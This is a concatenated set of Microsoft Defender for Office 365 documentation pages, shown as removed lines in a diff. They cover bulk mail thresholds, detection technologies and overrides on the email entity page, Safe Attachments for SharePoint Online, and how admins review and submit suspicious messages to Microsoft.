-1. If you receive complaints from users about too many bulk emails being blocked, you can adjust this threshold, or alternatively, submit the message to us, which will also add the sender to the Tenant Allow/Block List.
-
-> [!TIP]
-> Review this step-by-step guide for more details on allowing senders using the Tenant Allow/Block List: [How to handle legitimate emails getting blocked from delivery using Microsoft Defender for Office 365](how-to-handle-false-positives-in-microsoft-defender-for-office-365.md).
-
-## More aggressive strategies for managing bulk senders
-
-In some cases, the sender of bulk mail doesn't generate enough complaints for its messages to be assigned a BCL value high enough to be caught by your tuned threshold value. In this situation, it's possible to use transport rules to take an aggressive approach; however, use caution, as false positives (unwanted blocking) will occur. Tune the rules with exceptions and management to stay relevant for your organization's mail patterns.
-
-> [!TIP]
-> To better protect certain groups of users, such as your c-suite and priority accounts, you can create a specialized policy specifically scoped to them and set a higher BCL threshold, alongside a separate transport rule (if applicable). These groups of users might be more vulnerable to unsolicited emails due to their email addresses being readily accessible in the public domain.
-
-See [Use mail flow rules to filter bulk email in Exchange Online | Microsoft Learn](/exchange/security-and-compliance/mail-flow-rules/use-rules-to-filter-bulk-mail) for more information.
-
-## For customers with Microsoft Defender for Office 365
--- Customers with Microsoft Defender for Office 365 Plan 1 or higher can use the [email entity page](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/introducing-the-email-entity-page-in-microsoft-defender-for/ba-p/2275420) to discover the BCL value of messages instead of interrogating headers.--- Customers with Microsoft Defender for Office 365 Plan 2 can interrogate bulk values at scale using [advanced hunting](../anti-spam-spam-vs-bulk-about.md#how-to-tune-bulk-email).-
-[How to tune bulk email]
-
-## More Information
-
-[Email Protection Basics in Microsoft 365: Bulk Email - Microsoft Community Hub](https://techcommunity.microsoft.com/t5/microsoft-defender-for-office/email-protection-basics-in-microsoft-365-bulk-email/ba-p/3445337)
-
-[What's the difference between junk email and bulk email?](../anti-spam-spam-vs-bulk-about.md)
security Understand Detection Technology In Email Entity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/understand-detection-technology-in-email-entity.md
- Title: Understanding detection technology within the email entity page in Microsoft Defender for Office 365
-description: Guide to understanding the detection technology shown on the email entity page in Microsoft Defender for Office 365, what the detection technologies mean, how they're triggered, and how to resolve false positives (see the admin submission video).
----- Previously updated : 07/03/2023--- m365-guidance-templates-- m365-security-- tier3--
-# Understanding detection technology in the email entity page of Microsoft Defender for Office 365
-
-If a threat is detected on the Microsoft Defender for Office 365 [*email entity page*](../mdo-email-entity-page.md), threat information will display on the left-hand flyout. This panel will also show you the **detection technology** that led to that verdict.
-
-This article is all about helping you **understand the different detection technologies**, how they work, and how to avoid any false alarms. Stay tuned for the Admin Submissions video at the end.
-
-## Detection technology details table
-
-To resolve false positives like the ones listed in the table below, you should always start with an **admin submission**, which will also prompt you to add an entry into the Tenant Allow/Block List (TABL). This entry adds a temporary override signal to the filters that determined the message was *malicious*, while filters are updated (if that's appropriate). See the articles below for more information on Admin submissions & TABL.
--- [Submissions: Report good email to Microsoft](../submissions-admin.md)-- [Tenant Allow/Block List](../tenant-allow-block-list-about.md)-
-|The Detection technology|How it reaches a verdict|Notes|
-| -- | -- | -- |
-|Advanced filter|Machine learning models based detection on email & contents, to detect phish & spam|
-|Antimalware protection|Detection from signature based anti-malware engines||
-|Bulk|Detection for advertising / marketing and similar message types with their relative complaint levels|[Step-by-Step guide on how to tune bulk thresholds](tune-bulk-mail-filtering-walkthrough.md)|
-|Campaign|Messages identified and grouped as part of a malware or phish campaign|[Learn more about campaigns](track-and-respond-to-emerging-threats-with-campaigns.md)|
-|Domain reputation|The message was sent from a domain that was identified as spam or phish domain, based on internal or external signals||
-|File detonation|Safe Attachments detected a malicious attachment during detonation within a sandbox||
-|File detonation reputation|File attachments previously detected by Safe Attachments during detonation||
-|File reputation|The message contains a file that was previously identified as malicious by other sources||
-|Fingerprint matching|The message resembles a previously detected malicious or spam message||
-|General filter|Phishing or spam signals based on analyst heuristics||
-|Impersonation brand|Sender impersonation of well-known brands||
-|Impersonation domain|Impersonation of sender domains that you own or specified for protection in anti-phishing policies|[Impersonation insight overview](../anti-phishing-mdo-impersonation-insight.md)|
-|Impersonation user|Impersonation of protected senders that you specified in anti-phishing policies|[Impersonation insight overview](../anti-phishing-mdo-impersonation-insight.md)|
-|IP reputation|The message was sent from an IP that was identified as potentially malicious||
-|Mailbox intelligence impersonation|Sender detected as impersonating an address in the user's personal sender map|[Mailbox intelligence impersonation protection](../anti-phishing-policies-about.md)|
-|Mixed analysis detection|Multiple filters contributed to the verdict for this message||
-|Spoof DMARC|The message failed DMARC authentication|[How Microsoft 365 handles inbound email that fails DMARC](../email-authentication-dmarc-configure.md)|
-|Spoof external domain|Spoof intelligence detected email spoofing of a domain that is external to your organization||
-|Spoof intra-org|Spoof intelligence detected email spoofing of a user or domain that is internal to your organization||
-|URL detonation|Safe Links detected a malicious URL in the message during detonation within a sandbox||
-|URL detonation reputation|URLs previously detected by Safe Links during detonation||
-|URL malicious reputation|The message contains a URL that was previously identified as malicious or spam by other sources||
-
-## Watch a video on submitting messages to Microsoft to learn more
-> [!VIDEO https://www.youtube.com/embed/ta5S09Yz6Ks]
security Understand Overrides In Email Entity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/understand-overrides-in-email-entity.md
- Title: Understanding overrides within the email entity page in Microsoft Defender for Office 365
-description: Shows the different overrides in the email entity page in Microsoft Defender for Office 365 to help admins troubleshoot configurations.
-------- m365-guidance-templates-- m365-security-- tier3 Previously updated : 08/14/2023--
-# Understanding overrides within the email entity page in Microsoft Defender for Office 365
-
-Within the Microsoft Defender for Office 365 *[email entity page](../mdo-email-entity-page.md)*, there's a wealth of useful information about an email, including if applicable the **overrides** which affected that message, and potentially the location that the message was delivered or moved to post delivery.
-
-This article is all about helping you **understand the different overrides**, how they're triggered, and helpful information for diagnosing when the effect of an override was unexpected, such as an email being blocked when no threats were found.
-
-## Overrides details table
-
-The following table lists all overrides, a description of what that override means and some starting points for troubleshooting. Not all overrides are honored, depending on the circumstance. For example an email that contains malware is automatically blocked regardless if an end user set the sender as a "safe sender". To learn more about how overrides are applied see [this table](../how-policies-and-protections-are-combined.md).
-
-| Override |Description|Notes|
-| -- | -- | -- |
-| Third Party Filter |We detected you're using a third party for your MX record and have an SCL-1 transport rule, overriding filtering and Secure by Default.||
-|Admin initiated time travel|Admin triggered investigation, which leads to zero-hour autopurge (ZAP) modifying the delivery location of messages.|[Learn more about ZAP.](../zero-hour-auto-purge.md)|
-|Antimalware policy block by file type|The file extension for an attachment within the message matched a banned file type listed in the anti-malware policy for the recipient|You may wish to tweak the file extensions listed in the Common attachments filter section of the anti-malware policy. [Learn more](../anti-malware-policies-configure.md).|
-|Antispam policy settings|The message matched a custom option in the anti-spam policy for the recipient. For example: "SPF record: hard fail" or "Empty messages".|Check the "Mark as spam" options in the anti-spam policy for the affected recipient. [Learn more](../anti-spam-policies-configure.md).|
-|Connection policy|The message originated from an allowed / blocked IP within your connection filter policy.|Check the "Connection filter policy" within the anti-spam policies section of the security portal. [Learn more](../connection-filter-policies-configure.md).|
-|Exchange transport rule|The message matched a custom transport rule that affected the final delivery location.|You can use the email entity page, or Exchange message trace to highlight which transport rule was triggered. [Learn more](/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules).|
-|Exclusive mode (User override)|The recipient has chosen to mark all messages as spam unless they're received from a sender in their trusted contact list.|The recipient has likely configured: "Don't trust email unless it comes from someone in my Safe Senders and Recipients list" within the Junk email settings in Outlook or OWA. [Learn more](/powershell/module/exchange/set-mailboxjunkemailconfiguration).|
-|Filtering skipped due to on-premises organization|The message was marked as nonspam by your Exchange on-premises environment before being delivered to Exchange Online|You should review your on-premises environment to locate the source of the override.|
-|IP region filter from policy|The message was detected as coming from a country/region that an admin has selected to block in the anti-spam policy for the recipient.|Modify the "From these countries/regions" option within the anti-spam policy applied to the affected recipient. [Learn more](../anti-spam-policies-configure.md).|
-|Language filter from policy|The message was detected as containing a language that an admin has selected to block in the anti-spam policy for the recipient.|Modify the "Contains specific languages" option within the anti-spam policy to the affected recipient. [Learn more](../anti-spam-policies-configure.md).|
-|Phishing simulation|The message met the criteria defined by an administrator to be considered a phishing simulation message.|Criteria are within the "Phishing simulation" tab within Advanced delivery in the security portal. [Learn more](../advanced-delivery-policy-configure.md).|
-|Quarantine release| The recipient or an administrator released this message from quarantine.|[Learn more](../quarantine-end-user.md).|
-|SecOps Mailbox|The message was sent to the specific security operations mailbox defined by an administrator.|Mailboxes are defined within the "SecOps mailbox" tab within Advanced delivery in the security portal. [Learn more](../advanced-delivery-policy-configure.md).|
-|Sender address list (Admin Override)|The message matched an entry in the allowed/blocked senders within the anti-spam policy for the recipient.|Check the "Allowed and blocked senders and domains" section of the relevant anti-spam policy. (allows with this method aren't recommended). [Learn more](../create-safe-sender-lists-in-office-365.md).|
-|Sender address list (User override)|The recipient has manually set this sender address to be delivered to the inbox (allowed) or junk email folder (blocked).|The recipient has likely configured "Safe senders and domains" or "Blocked senders and domains" within the Junk email settings in Outlook or OWA. [Learn more](/powershell/module/exchange/set-mailboxjunkemailconfiguration).|
-|Sender domain list (Admin Override)|The message matched an entry in the allowed/blocked domains within the anti-spam policy for the recipient.|Check the "Allowed and blocked senders and domains" section of the relevant anti-spam policy. (allows with this method aren't recommended). [Learn more](../create-safe-sender-lists-in-office-365.md).|
-|Sender domain list (User override)|The recipient has manually set the sending domain to be delivered to the inbox (allowed) or junk email folder (blocked).|The recipient has likely configured "Safe senders and domains" or "Blocked senders and domains" within the Junk email settings in Outlook or OWA. [Learn more](/powershell/module/exchange/set-mailboxjunkemailconfiguration).|
-|Tenant Allow/Block List file|An entry was matched for a file hash listed in the Tenant allow/block list.|Review the entires within the "Tenant Allow/Block Lists" page within the security portal. [Learn more](../tenant-allow-block-list-about.md).|
-|Tenant Allow/Block List sender email address|An entry was matched for a sender address listed in the Tenant allow/block list.|Review the entires within the "Tenant Allow/Block Lists" page within the security portal. [Learn more](../tenant-allow-block-list-about.md).|
-|Tenant Allow/Block List spoof|An entry was matched for spoof detection in the Tenant allow/block list.|Review the entires within the "Tenant Allow/Block Lists" page within the security portal. [Learn more](../tenant-allow-block-list-about.md).|
-|Tenant Allow/Block List URL| An entry was matched for a URL listed in the Tenant allow/block list.|Review the entires within the "Tenant Allow/Block Lists" page within the security portal. [Learn more](../tenant-allow-block-list-about.md).|
-|Trusted contact list (User override)|The recipient has chosen to mark contacts in their contacts folder as trusted senders automatically.|The recipient has likely configured: "Trust email from my contacts" within the Junk email settings in Outlook or OWA. [Learn more](/powershell/module/exchange/set-mailboxjunkemailconfiguration).|
-|Trusted domain (User override)|The recipient has added this domain to their safe recipients list within Outlook, emails sent to this domain aren't treated as junk email.|The recipient has likely configured "Safe Recipients" within Outlook's Junk email options. [Learn more](https://support.microsoft.com/office/block-or-allow-junk-email-settings-48c9f6f7-2309-4f95-9a4d-de987e880e46).|
-|Trusted recipient (User override)|The recipient has added this sender to their safe recipients list within Outlook, emails sent to this sender aren't treated as junk email.|The recipient has likely configured "Safe Recipients" within Outlook's Junk email options. [Learn more](https://support.microsoft.com/office/block-or-allow-junk-email-settings-48c9f6f7-2309-4f95-9a4d-de987e880e46).|
-|Trusted senders only (User override)|This override has same behavior as the Exclusive mode (User override), primarily used in outlook.com.|See "Exclusive mode (User override)"|
-
-## Next steps
-
-You can find a similar detailed table covering all the different detection technologies at [aka.ms/emailtech](understand-detection-technology-in-email-entity.md).
security Utilize Microsoft Defender For Office 365 In Sharepoint Online https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/step-by-step-guides/utilize-microsoft-defender-for-office-365-in-sharepoint-online.md
- Title: Use Microsoft Defender for Office 365 in SharePoint Online
-description: The steps to ensure that you can use, and get the value from, Microsoft Defender for Office 365 in SharePoint Online and OneDrive.
------- m365-guidance-templates-- m365-security-- tier3- Previously updated : 01/31/2023--
-# Use Microsoft Defender for Office 365 with SharePoint Online
-
-Microsoft SharePoint Online is a widely used user collaboration and file storage tool. The following steps help reduce the attack surface area in SharePoint Online and that help keep this collaboration tool in your organization secure. However, it's important to note there's a balance to strike between security and productivity, and not all these steps might be relevant for your organizational risk profile. Take a look, test, and maintain that balance.
-
-## What you need
--- Microsoft Defender for Office 365 Plan 1-- Sufficient permissions (SharePoint administrator/security administrator).-- Microsoft SharePoint Online (part of Microsoft 365).-- Five to 10 minutes to perform these steps.-
-## Turn on Microsoft Defender for Office 365 in SharePoint Online
-
-If you're licensed for Microsoft Defender for Office 365 **(free 90-day evaluation available at aka.ms/trymdo)**, you can ensure seamless protection from zero day malware and time of click protection within Microsoft Teams.
-
-To learn more, read [Step 1: Use the Microsoft Defender portal to turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](../safe-attachments-for-spo-odfb-teams-configure.md#step-1-use-the-microsoft-defender-portal-to-turn-on-safe-attachments-for-sharepoint-onedrive-and-microsoft-teams).
-
-1. Sign in to the [security center's safe attachments configuration page](https://security.microsoft.com/safeattachmentv2).
-1. Select **Global settings**.
-1. Ensure that **Turn on Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams** is set to **on**.
-1. Select **Save**.
-
-## Stop infected file downloads from SharePoint Online
-
-By default, users can't open, move, copy, or share malicious files that are detected by Safe Attachments for SharePoint, OneDrive, and Microsoft Teams. However, the *Download* option is still available and should be *disabled*.
-
-To learn more, read [Step 2: (*Recommended*) Use SharePoint Online PowerShell to prevent users from downloading malicious files](../safe-attachments-for-spo-odfb-teams-configure.md#step-2-recommended-use-sharepoint-online-powershell-to-prevent-users-from-downloading-malicious-files).
-
-1. Open and connect to [SharePoint Online PowerShell](/powershell/sharepoint/sharepoint-online/connect-sharepoint-online).
-1. Run the following command: **Set-SPOTenant -DisallowInfectedFileDownload $true**.
-
-### Further reading
-
-[Policy recommendations for securing SharePoint sites and files](../zero-trust-identity-device-access-policies-sharepoint.md)
security Submissions Admin Review User Reported Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-admin-review-user-reported-messages.md
- Title: Admin review for user reported messages-- NOCSH-----
- - m365-security
- - tier2
-
-description: Admins can learn how to review messages that were reported by users and give them feedback.
- Previously updated : 6/20/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Admin review for user reported messages
--
-In Microsoft 365 organizations with Exchange Online mailboxes and Microsoft Defender for Office 365, admins can send templated result messages back to users after they review the user reported messages. Admins can customize the notification message template that's used for the organization.
-
-The feature is designed to give feedback to users without changing the message verdicts in the system. To help Microsoft update and improve its filters, admins need to [submit user reported messages to Microsoft for analysis](submissions-admin.md#submit-user-reported-messages-to-microsoft-for-analysis) when the user reported settings are configured to send user reported messages to the reporting mailbox only. For more information, see [User reported settings](submissions-user-reported-messages-custom-mailbox.md).
-
-Admins can mark messages and notify users of review results only if the user [reported the message as a false positive or a false negative](submissions-outlook-report-messages.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>. To go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.--- If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page:
- - **Email authentication check** (email messages only): Whether email authentication passed or failed when it was delivered.
- - **Policy hits**: Information about any policies or overrides that might have allowed or blocked the incoming email into the organization, thus overriding our filtering verdicts.
- - **Payload reputation/detonation**: Up-to-date examination of any URLs and attachments in the message.
- - **Grader analysis**: Review done by human graders to confirm whether or not messages are malicious.
-
- So, submitting or resubmitting messages to Microsoft is useful to admins only for messages that have never been submitted to Microsoft, or when you disagree with the original verdict.
--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Authorization and settings/System settings/Read-only**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo): Membership in the **Organization Management** role group.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, or **Global Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- You need access to Exchange Online PowerShell. If your account doesn't have access to Exchange Online PowerShell, you get the following error: *Specify an email address in your domain*. For more information about enabling or disabling access to Exchange Online PowerShell, see the following articles:
- - [Enable or disable access to Exchange Online PowerShell](/powershell/exchange/disable-access-to-exchange-online-powershell)
- - [Client Access Rules in Exchange Online](/exchange/clients-and-mobile-in-exchange-online/client-access-rules/client-access-rules) ([until October 2023](https://techcommunity.microsoft.com/t5/exchange-team-blog/deprecation-of-client-access-rules-in-exchange-online/ba-p/3638563))
-
-## Notify users from within the portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **Submissions** page at **Email & collaboration** \> **Submissions**. Or, to go directly to the **Submissions** tab, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **User reported** tab.
-
-3. On the **User reported** tab, select the user reported message by using either of the following methods:
-
- - Select the message from the list by selecting the check box next to the first column, and then select :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify**.
- - Select the message from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify** or :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More options** \> :::image type="icon" source="../../media/m365-cc-scc-mark-and-notify-icon.png" border="false"::: **Mark as and notify**.
-
-4. In the **Mark as and notify** dropdown list, select one of the following values:
-
- - Available verdicts for email messages:
- - **No threats found**
- - **Phishing**
- - **Spam**
-
- - Available verdicts for Microsoft Teams messages:
- - **No threats found**
- - **Phishing**
-
-The reported message is marked with the selected verdict, and an email message is automatically sent to notify the user who reported the message.
-
-To customize the notification email, see the next section.
-
-## Customize the messages used to notify users
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to the **User reported** page at **Settings** \> **Email & collaboration** \> **User reported settings** tab. Or, to go directly to the **User reported settings** page, use <https://security.microsoft.com/securitysettings/userSubmission>.
-
-2. On the **User reported settings** page, verify that **Monitor reported messages in Outlook** is selected in the **Outlook** section at the top of the page.
-
-3. Find the **Email notifications** section and configure one or more of the following settings:
-
- - **Results email** section: Select **Customize results email**. In the **Customize admin review email notifications** flyout that opens, configure the following settings on the **Phishing**, **Junk** and **No threats found** tabs:
- - **Email body results text**: Enter the custom text to use. You can use different text for **Phishing**, **Junk** and **No threats found**.
- - **Email footer text**: Enter the custom message footer text to use. The same text is used for **Phishing**, **Junk** and **No threats found**.
-
- When you're finished in the **Customize admin review email notifications** flyout, select **Confirm** to return to the **User reported settings** page.
-
- :::image type="content" source="../../media/admin-review-customize-message.png" alt-text="The Customize confirmation message flyout." lightbox="../../media/admin-review-customize-message.png":::
-
- - **Customize sender and branding** section:
- - **Specify a Microsoft 365 mailbox to use ads the From address of email notifications**: Select this option and enter the sender's email address in the box that appears. If you don't select this option, the default sender is submissions@messaging.microsoft.com.
- - **Replace the Microsoft logo with my organization's logo across all reporting experiences**: Select this option to replace the default Microsoft logo that's used in notifications. Before you do this step, follow the instructions in [Customize the Microsoft 365 theme for your organization](/microsoft-365/admin/setup/customize-your-organization-theme) to upload your custom logo.
-
-4. When you're finished on the **User reported settings** page, select **Save**.
security Submissions Admin https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/submissions-admin.md
- Title: Manage submissions
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier1
-
-description: "Admins can learn how to use the Submissions page in the Microsoft Defender portal to submit messages, URLs, and email attachments to Microsoft for analysis. Reasons for submission include: legitimate messages that were blocked, suspicious messages that were allowed, suspected phishing email, spam, malware, and other potentially harmful messages."
- Previously updated : 4/19/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Use the Submissions page to submit suspected spam, phish, URLs, legitimate email getting blocked, and email attachments to Microsoft
--
-For more information about what Microsoft does to your submissions, [check this out](submissions-report-messages-files-to-microsoft.md#report-suspicious-email-messages-to-microsoft).
-
-In Microsoft 365 organizations with Exchange Online mailboxes, admins can use the **Submissions** page in the Microsoft Defender portal to submit messages, URLs, and attachments to Microsoft for analysis. There are two basic types of admin submissions:
--- **Admin-originated submissions**: Admins identify and report messages, attachments, or URLs (entities) by selecting :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis** from the tabs on the **Submissions** page as described in the [Admin-originated submissions](#admin-originated-submissions) section.-
- After the admin reports the entity, an entry appears on the corresponding tab on the **Submissions** page (anywhere except the **User reported** tab).
--- **Admin submission of user reported messages**: The built-in [user reporting experience](submissions-user-reported-messages-custom-mailbox.md) is turned on and configured. User reported messages appear on the **User reported** tab on the **Submissions** page, and admins submit or resubmit the messages to Microsoft from the **User reported** tab.-
- After an admin submits the message from the **User reported** tab, an entry is also created on the corresponding tab on the **Submissions** page (for example, the **Emails** tab). These types of admin submissions are described in the [Admin options for user reported messages](#admin-options-for-user-reported-messages) section.
-
-When admins submit messages to Microsoft for analysis, we do the following checks:
--- **Email authentication check** (email messages only): Whether email authentication passed or failed when it was delivered.-- **Policy hits**: Information about any policies or overrides that might have allowed or blocked the incoming email into the organization, thus overriding our filtering verdicts.-- **Payload reputation/detonation**: Up-to-date examination of any URLs and attachments in the message.-- **Grader analysis**: Review done by human graders to confirm whether or not messages are malicious.-
-> [!IMPORTANT]
-> In U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD), admins can submit email messages to Microsoft for analysis, but the messages are analyzed for email authentication and policy hits only. Payload reputation, detonation, and grader analysis aren't done for compliance reasons (data isn't allowed to leave the organization boundary).
-
-Watch this short video to learn how to use admin submissions in Microsoft Defender for Office 365 to submit messages to Microsoft for evaluation.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWBLPn]
-
-For more information about how **users** can submit messages and files to Microsoft, see [Report messages and files to Microsoft](submissions-report-messages-files-to-microsoft.md).
-
-For other ways that **admins** can report messages to Microsoft in the Defender portal, see [Related reporting settings for admins](submissions-report-messages-files-to-microsoft.md#related-reporting-settings-for-admins).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com/>. To go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Security operations/Security data/Response (manage)** or **Security operations/Security data/Security data basics (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in the **Security Administrator** or **Security Reader** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Security Administrator** or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- Admins can submit email messages as old as 30 days if they're still available in the mailbox and haven't been purged by the user or an admin.--- Admin submissions are throttled at the following rates:
- - Maximum submissions in any 15-minute period: 150 submissions
- - Same submissions in a 24 hour period: Three submissions
- - Same submissions in a 15-minute period: One submission
--- If the [User reported settings](submissions-user-reported-messages-custom-mailbox.md) in the organization send user reported messages (email and [Microsoft Teams](submissions-teams.md)) to Microsoft (exclusively or in addition to the reporting mailbox), we do the same checks as when admins submit messages to Microsoft for analysis from the **Submissions** page. So, submitting or resubmitting messages to Microsoft is useful to admins only for messages that have never been submitted to Microsoft, or when you disagree with the original verdict.--- A **Files** tab is available on the **Submissions** page only in organizations with Microsoft Defender XDR or Microsoft Defender for Endpoint Plan 2. For information and instructions to submit files from the **Files** tab, see [Submit files in Microsoft Defender for Endpoint](../defender-endpoint/admin-submissions-mde.md).-
-## Admin-originated submissions
-
-> [!TIP]
-> The tab where you select select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis** doesn't particularly matter, as long as you set **Select the submission type** to the correct value.
-
-### Report questionable email to Microsoft
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, verify that the **Emails** tab is selected.
-
-3. On the **Emails** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. On the first page of the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **Email** is selected.
-
- - **Add the network message ID or upload the email file**: Select one of the following options:
- - **Add the email network message ID**: The GUID value is available in the **X-MS-Exchange-Organization-Network-Message-Id** header in the message or in the **X-MS-Office365-Filtering-Correlation-Id** header in quarantined messages.
- - **Upload the email file (.msg or .eml)**: Select **Browse files**. In the dialog that opens, find and select the .eml or .msg file, and then select **Open**.
-
- - **Choose at least one recipient who had an issue**: Specify the recipients to run a policy check against. The policy check determines if the email bypassed scanning due to user or organization policies or override.
-
- - **Why are you submitting this message to Microsoft?**: Select one of the following values:
- - **It appears suspicious**: Select this value only when you don't know or you're unsure of the message verdict and you would like to get a verdict from Microsoft. Select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's a threat**: In all other cases, select this value after you've already determined the message verdict as malicious. Select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
- - **Spam**
-
- Select **Next**.
-
- :::image type="content" source="../../media/admin-submission-email-block.png" alt-text="Submit a false negative (bad) email to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-email-block.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Block all emails from this sender or domain**: This option creates a block entry for the sender domain or email address in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - By default, **Sender** is selected but you can select **Domain** instead.
- - **Remove block entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
- - **Never expire**
- - **Specific date**: The maximum value is 30 days from today.
- - **Block entry note (optional)**: Enter optional information about why you're blocking this item.
-
- When you're finished on the second page of the **Submit to Microsoft for analysis** flyout, select **Submit**.
-
- :::image type="content" source="../../media/admin-submission-email-block-page-2.png" alt-text="Choose whether to create a corresponding block entry for the sender domain or email address in the Tenant Allow/Block List." lightbox="../../media/admin-submission-email-block-page-2.png":::
-
-6. Select **Done**.
-
-After a few moments, the block entry is available on the **Domains & addresses** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=Sender>.
-
-### Report questionable email attachments to Microsoft
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Actions & submissions** \> **Submissions**. Or, to go directly to the **Submissions** page, use <https://security.microsoft.com/reportsubmission>.
-
-2. On the **Submissions** page, select the **Email attachments** tab.
-
-3. On the **Email attachments** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Submit to Microsoft for analysis**.
-
-4. On the first page of the **Submit to Microsoft for analysis** flyout that opens, enter the following information:
-
- - **Select the submission type**: Verify the value **Email attachment** is selected.
-
- - **File**: Select :::image type="icon" source="../../media/m365-cc-sc-import-icon.png" border="false"::: **Browse files** to find and select the file to submit.
-
- - **Why are you submitting this email attachment to Microsoft?**: Select one of the following values:
- - **It appears suspicious**: Select this value if you're unsure and you want a verdict from Microsoft, select **Submit**, and then go to Step 6.
-
- or
-
- - **I've confirmed it's a threat**: Select this value if you're sure that the item is malicious, and then select one of the following values in the **Choose a category** section that appears:
- - **Phish**
- - **Malware**
-
- Select **Next**.
-
- :::image type="content" source="../../media/admin-submission-file-block.png" alt-text="Submit a false negative (bad) email attachment to Microsoft for analysis on the Submissions page in the Defender portal." lightbox="../../media/admin-submission-file-block.png":::
-
-5. On the second page of the **Submit to Microsoft for analysis** flyout that opens, do one of the following steps:
- - Select **Submit**.
-
- or
-
- - Select **Block this file**: This option creates a block entry for the file in the Tenant Allow/Block List. For more information about the Tenant Allow/Block List, see [Manage allows and blocks in the Tenant Allow/Block List](tenant-allow-block-list-about.md).
-
- After you select this option, the following settings are available:
-
- - **Remove block entry after**: The default value is **30 days**, but you can select from the following values:
- - **1 day**
- - **7 days**
- - **30 days**
